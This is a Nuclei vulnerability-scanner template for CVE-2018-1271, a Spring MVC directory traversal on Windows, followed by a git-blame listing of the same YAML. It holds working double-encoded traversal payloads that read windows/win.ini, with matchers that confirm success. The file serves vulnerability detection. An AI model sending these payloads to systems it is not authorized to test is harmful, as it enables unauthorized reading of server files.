nuclei-templates/cves/2018/CVE-2018-1271.yaml

id: CVE-2018-1271

info:
  name: Spring MVC Directory Traversal Vulnerability
  author: hetroublemakr
  severity: medium
  reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
  tags: cve,cve2018,spring,lfi
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.90
    cve-id: CVE-2018-1271
    cwe-id: CWE-22
  description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
      - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'for 16-bit app support'
      - type: status
        status:
          - 200
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-1271`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00
			`info:`
			`name: Spring MVC Directory Traversal Vulnerability`
			`author: hetroublemakr`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2018,spring,lfi`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 5.90`
			`cve-id: CVE-2018-1271`
			`cwe-id: CWE-22`
			`description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
			`- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'`
Fixed default condition OR to AND in false-positives 2020-07-08 11:38:57 +00:00			`matchers-condition: and`
Create CVE-2018-1271.yaml 2020-06-03 00:53:25 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- 'for 16-bit app support'`
			`- type: status`
			`status:`
			`- 200`